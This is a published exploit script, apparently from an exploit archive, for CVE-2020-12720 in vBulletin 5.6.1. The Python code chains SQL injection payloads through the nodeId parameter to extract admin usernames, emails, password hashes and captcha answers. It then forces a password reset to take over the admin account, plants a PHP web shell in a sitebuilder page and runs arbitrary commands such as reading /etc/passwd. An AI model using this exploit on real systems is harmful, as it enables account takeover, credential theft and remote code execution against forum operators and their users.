vBulletin 5.6.1 - 'nodeId' SQL Injection

# Exploit Title: vBulletin 5.6.1 - 'nodeId' SQL Injection
# Date: 2020-05-15
# Exploit Author: Photubias
# Vendor Advisory: [1] https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1
# Version: vBulletin v5.6.x (prior to Patch Level 1)
# Tested on: vBulletin v5.6.1 on Debian 10 x64
# CVE: CVE-2020-12720 vBulletin v5.6.1 (SQLi) with path to RCE

#!/usr/bin/env python3
'''

    
	Copyright 2020 Photubias(c)

        This program is free software: you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation, either version 3 of the License, or
        (at your option) any later version.

        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
        GNU General Public License for more details.

        You should have received a copy of the GNU General Public License
        along with this program.  If not, see <http://www.gnu.org/licenses/>.
        
        File name CVE-2020-12720.py
        written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

        This is a native implementation without requirements, written in Python 3.
        Works equally well on Windows as Linux (as MacOS, probably ;-)
        
        ##-->> Full creds to @zenofex and @rekter0 <<--##
'''
import urllib.request, urllib.parse, sys, http.cookiejar, ssl, random, string

## Static vars; change at will, but recommend leaving as is
sADMINPASS = '12345678'
sCMD = 'id'
sURL = 'http://192.168.50.130/'
sUSERID = '1'
sNEWPASS = '87654321'
iTimeout = 5

## Ignore unsigned certs
ssl._create_default_https_context = ssl._create_unverified_context

## Keep track of cookies between requests
cj = http.cookiejar.CookieJar()
oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))

def randomString(stringLength=8):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(stringLength))

def getData(sUrl, lData):
    try:
        oData = urllib.parse.urlencode(lData).encode()
        oRequest = urllib.request.Request(url = sUrl, data = oData)
        return oOpener.open(oRequest, timeout = iTimeout)
    except:
        print('----- ERROR, site down?')
        sys.exit(1)

def verifyBug(sURL,sUserid='1'):
    sPath = 'ajax/api/content_infraction/getIndexableContent'
    lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,"cve-2020-12720",8,7,6,5,4,3,2,1;--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if not 'cve-2020-12720' in sResponse:
        print('[!] Warning: not vulnerable to CVE-2020-12720, credentials are needed!')
        return False
    else:
        print('[+] SQLi Success!')
        return True

def takeoverAccount(sURL, sNEWPASS):
    sPath = 'ajax/api/content_infraction/getIndexableContent'
    ### Source: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
    ## Get Table Prefixes
    lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,table_name,8,7,6,5,4,3,2,1 from information_schema.columns WHERE column_name=\'phrasegroup_cppermission\';--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'rawtext' in sResponse: sPrefix = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','').replace('language','')
    else: sPrefix = ''
    #print('[+] Got table prefix "'+sPrefix+'"')

    ## Get usergroup ID for "Administrators"
    lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,usergroupid,8,7,6,5,4,3,2,1 from ' + sPrefix + 'usergroup WHERE title=\'Administrators\';--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    sGroupID = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','')
    #print('[+] Administrators Group ID: '+sGroupID)
    
    ## Get admin data, including original token (password hash), TODO: an advanced exploit could restore the original hash in post exploitation
    lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,concat(username,0x7c,userid,0x7c,email,0x7c,token),8,7,6,5,4,3,2,1 from ' + sPrefix + 'user where usergroupid=' + sGroupID + ';--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    sUsername,sUserid,sUsermail,sUserTokenOrg = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','').split('|')
    #print('[+] Got original token (' + sUsername + ', ' + sUsermail + '): ' + sUserTokenOrg)

    ## Let's create a Human Verify Captcha
    sPath = 'ajax/api/hv/generateToken?'
    lData = {'securitytoken':'guest'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'hash' in sResponse: sHash = sResponse.split('hash')[1].split(':')[1].replace('}','').replace('"','')
    else: sHash = ''

    ## Get the captcha answer from DB
    sPath = 'ajax/api/content_infraction/getIndexableContent'
    lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,count(answer),8,7,6,5,4,3,2,1 from ' + sPrefix + 'humanverify limit 0,1--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'rawtext' in sResponse: iAnswers = int(sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"',''))
    else: iAnswers = 1

    lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,answer,8,7,6,5,4,3,2,1 from ' + sPrefix + 'humanverify limit ' + str(iAnswers-1) + ',1--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'rawtext' in sResponse: sAnswer = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','')
    else: sAnswer = ''

    ## Now request PW reset and retrieve the token
    sPath = 'auth/lostpw'
    lData = {'email':sUsermail,'humanverify[input]':sAnswer,'humanverify[hash]':sHash,'securitytoken':'guest'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    
    sPath = 'ajax/api/content_infraction/getIndexableContent'
    lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,activationid,8,7,6,5,4,3,2,1 from ' + sPrefix + 'useractivation WHERE userid=' + sUserid + ' limit 0,1--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'rawtext' in sResponse: sToken = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','')
    else: sToken = ''

    ## Finally the password reset itself
    sPath = 'auth/reset-password'
    lData = {'userid':sUserid,'activationid':sToken,'new-password':sNEWPASS,'new-password-confirm':sNEWPASS,'securitytoken':'guest'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if not 'Logging in' in sResponse:
        print('[-] Failed to reset the password')
        return ''
    else:
        print('[+] Success! User ' + sUsername + ' now has password ' + sNEWPASS)
    return sUserid

def createBackdoor(sURL, sADMINPASS, sUserid='1'):
    ## Activating Sitebuilder
    sPath = 'ajax/activate-sitebuilder'
    lData = {'pageid':'1', 'nodeid':'0','userid':'1','loadMenu':'false', 'isAjaxTemplateRender':'true', 'isAjaxTemplateRenderWithData':'true','securitytoken':'1589477194-0e3085507fb50fc1631610a28e045c5fa71a2a12'}
    oResponse = getData(sURL + sPath, lData)
    if not oResponse.code == 200:
        print('[-] Error activating sitebuilder')
        sys.exit(1)

    ## Confirming the password, getting new securitytoken
    sPath = 'auth/ajax-login'
    lData = {'logintype':'cplogin','userid':sUserid,'password':sADMINPASS,'securitytoken':'1589477194-0e3085507fb50fc1631610a28e045c5fa71a2a12'}
    oResponse = getData(sURL + sPath, lData)
    sResponse = oResponse.read().decode()
    if 'lostpw' in sResponse:
        print('[-] Error: authentication for userid ' + sUserid + ' failed')
        sys.exit(1)
    sToken = sResponse.split(',')[1].split(':')[1].replace('"','').replace('}','')
    print('[+] Got token: '+sToken)

    ## cpsession is needed, use this for extra verification
    #for cookie in cj: print(cookie.name, cookie.value, cookie.domain) #etc etc

    ## First see if our backdoor does not already exists
    sPath = 'ajax/render/admin_sbpanel_pagelist_content_wrapper'
    lData = {'isAjaxTemplateRenderWithData':'true','securitytoken':sToken}
    oResponse = getData(sURL + sPath, lData)
    sResponse = oResponse.read().decode()
    if 'cve-2020-12720' in sResponse:
        sPageName = 'cve-2020-12720-' + sResponse.split('/cve-2020-12720-')[1].split(')')[0]
        print('[+] This machine was already pwned, using "' + sPageName + '" for your command')
        return sPageName
    

    ## Create a new empty page
    sPath = 'ajax/api/widget/saveNewWidgetInstance'
    lData = {'containerinstanceid':'0','widgetid':'23','pagetemplateid':'','securitytoken':sToken}
    oResponse = getData(sURL + sPath, lData)
    sResponse = oResponse.read().decode()
    sWidgetInstanceID = sResponse.split(',')[0].split(':')[1].replace('}','')
    sPageTemplateID = sResponse.split(',')[1].split(':')[1].replace('}','')
    print('[+] Got WidgetInstanceID: '+sWidgetInstanceID+' and PageTemplateID: '+sPageTemplateID)

    ## Now submitting the page content
    sPageName = 'cve-2020-12720-'+randomString()
    sPath = 'ajax/api/widget/saveAdminConfig'
    lData = {'widgetid':'23',
             'pagetemplateid':sPageTemplateID,
             'widgetinstanceid':sWidgetInstanceID,
             'data[widget_type]':'',
             'data[title]':sPageName,
             'data[show_at_breakpoints][desktop]':'1',
             'data[show_at_breakpoints][small]':'1',
             'data[show_at_breakpoints][xsmall]':'1',
             'data[hide_title]':'0',
             'data[module_viewpermissions][key]':'show_all',
             'data[code]':"echo('###SHELLRESULT###');system($_GET['cmd']);echo('###SHELLRESULT###');",
             'securitytoken':sToken}
    oResponse = getData(sURL + sPath, lData)
    if not oResponse.code == 200: print('[!] Error submitting page content for ' + sPageName)
    
    ## Finally saving the new page
    sPath = 'admin/savepage'
    lData = {'input[ishomeroute]':'0',
             'input[pageid]':'0',
             'input[nodeid]':'0',
             'input[userid]':'1',
             'input[screenlayoutid]':'2',
             'input[templatetitle]':sPageName,
             'input[displaysections[0]]':'[{"widgetId":"23","widgetInstanceId":"' + sWidgetInstanceID + '"}]',
             'input[displaysections[1]]':'[]',
             'input[displaysections[2]]':'[]',
             'input[displaysections[3]]':'[]',
             'input[pagetitle]':sPageName,
             'input[resturl]':sPageName,
             'input[metadescription]':'Photubias+Shell',
             'input[pagetemplateid]':sPageTemplateID,
             'url':sURL,
             'securitytoken':sToken}
    oResponse = getData(sURL + sPath, lData)
    if not oResponse.code == 200: print('[!] Error saving page content for ' + sPageName)
    return sPageName

def main():
    if len(sys.argv) == 1:
        print('[!] No arguments found: python3 CVE-2020-12720.py <URL> <CMD>')
        print('    Example: ./CVE-2020-12720.py http://192.168.50.130/ "cat /etc/passwd"')
        print('    But for now, ask questions then')
        sURL = input('[?] Please enter the address and path to vBulletin ([http://192.168.50.130/): ')
        if sURL == '': sURL = 'http://192.168.50.130'
    else:
        sURL = sys.argv[1]
        sCMD = sys.argv[2]
    if not sURL[:-1] == '/': sURL += '/'
    if not sURL[:4].lower() == 'http': sURL = 'http://' + sURL
    print('[+] Welcome, first verifying the SQLi vulnerability')
    if verifyBug(sURL):
        print("----\n" + '[+] Attempting automatic admin account takeover')
        sUSERID = takeoverAccount(sURL, sNEWPASS)
        sADMINPASS = sNEWPASS
        if sUSERID == '':
            sUSERID = '1'
            sADMINPASS = input('[?] Please enter the admin password (userid ' + sUSERID + '): ')
    else:
        sADMINPASS = input('[?] Please enter the admin password (userid ' + sUSERID + '): ')
    print("----\n"+'[+] So far so good, attempting the creation of the backdoor')
    sPageName = createBackdoor(sURL, sADMINPASS, sUSERID)

    if len(sys.argv) == 1: sCMD = input('[?] Please enter the command to run [id]: ')
    if sCMD == '': sCMD = 'id'
    sCmd =  urllib.parse.quote(sCMD)
    sPath = sPageName + "?cmd=" + sCmd

    print('[+] Opening '+sURL + sPath)
    try:
        oRequest = urllib.request.Request(url = sURL + sPath)
        oResponse = oOpener.open(oRequest, timeout = iTimeout)
        print('#######################')
        sResponse = oResponse.read().decode()
        print('[+] Command result:')
        print(sResponse.split('###SHELLRESULT###')[1])
    except:
        print('[-] Something went wrong, bad command?')
        sys.exit(1)


if __name__ == "__main__":
    main()

All rights reserved nPulse.net 2009 - 2020
Powered by: MVCP 2.0-RC / ASPF / PHP 7.4 / NGINX / FreeBSD